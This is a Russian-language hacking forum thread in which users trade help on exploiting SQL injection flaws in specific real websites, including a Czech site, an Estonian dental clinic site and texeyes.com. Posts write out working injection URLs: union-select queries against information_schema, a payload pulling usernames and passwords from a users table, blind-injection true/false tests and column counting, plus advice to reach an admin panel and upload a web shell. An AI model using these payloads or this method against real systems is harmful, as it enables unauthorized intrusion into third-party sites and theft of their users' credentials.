https://forum.antichat.ru/showthread.php?t=26510 статья не айс, почитай все комменты, что не поймешь - уже спрашивай
Укажи в хосте(для бд) свой хост где разрешен конект с удаленых машин, установи -зайди в админку и залей шелл, верни назад все назад.
http://www.vurv.cz/index.php?key=section&id=5%20or%201=@@version-- помогите плиз раскрутить дальше а то я не силёт в MS SQL
F4R тоесть. "ты не силён" ? А статьи почитать? вот подробный мануал, вопросы после прочтения: https://forum.antichat.ru/thread30501.html А если тебе нужно просто . что-бы кто-то за тебя всё сделал, то ты разделом ошибся, а возможно и форумом
fedi, http://www.sendspace.com/file/1heu65 - сервер л2. Смотри папку DBScript, там .sql файлы - изучай структуру бд сервера. Тогда не будет вопросов где лежат пароли и почему их нельзя достать. F4R, http://www.vurv.cz/index.php?key=section&id=5+union+select+null,null,null,null,table_name+from+information_schema.tables Но статью всеровно почитай. И это тоже http://msdn.microsoft.com/ru-ru/library/bb418490.aspx
http://dental.medicum.ee/index.php?sisu=tekst&mid=109 -109+union+select+concat_ws(kasutajanimi,0x3a,password) from kasutajad-- Таблица есть,но данные не выбираются.Количество полей верно.Я так понял,что она пустая ?
не ответ на вопрос, но вроде неправильно использована ф-я CONCAT_WS(separator,str1,str2,...) http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_concat-ws
На запрос www.......&sid=115' в браузере ваваливается следующее: Can not select table: SELECT * FROM ofagp WHERE id=115\' and enable=1 and language=2 ORDER BY od asc Подскажите что здесь можно сделать чтобы раскрутить sql инъекцию?
читай тут - http://forum.antichat.ru/thread43966.html и тут - http://forum.antichat.ru/thread104591.html и вообще много статей про Sql inj
У кого опыта побольше,помогите плиз раскрутить скулю, уже минут 30 бьюсь, безрезультатно... :'( http://texeyes.com/contact.php?d=5'
слепая походу! http://texeyes.com/contact.php?d=5%27+and+1=2 http://texeyes.com/contact.php?d=5%27+and+1=1 разные ответы
А разве может быть слепая, если ошибка вываливается? Это ты показал, что скуля вообще есть, а то что она есть я и так знаю, исходя из ошибки
2Imperou$ http://texeyes.com/contact.php?d=5+and+1=1/* получилась тока слепая скуля) ))) что ты понимаешь под слепой скулей?) то что ее на ощупь нада раскручивать одной интуицией где даже ошибки не выводятся?)
так не ругается Code: http://texeyes.com/contact.php?d=5+union+select+1,2,3,4,5,6+--+ А так идет перенаправление Code: http://texeyes.com/contact.php?d=5+order+by+1+--+ Может по union select побрутить?
Я считал, что слепая скуля, это когда вывод ошибок отключён.Например возвращает разные результаты, а не обязательно интуицией.Если ошибаюсь-поправьте, я далеко не спец. И ещё,я попросил помочь раскрутить, а не советы.Что это скуля я знаю и так.А блинд она или нет, это другой вопрос вроде. Версия 5.0.67-community, больше ничего не узнал =(
2 Imperrous так же как ты узнал версии тащи таблы из information_schema.tables и колонки из information_schema.column
Да ну я не совсем уж нуб.Версию узнал со скули с другого сайта на серваке, но дело в том, что с неё ничего не вытянешь.Доступа к мускул.юзер нет, файл прив отключён, таблиц с админскими и юзерскими данными тоже нет, один мусор и всего то пару таблов.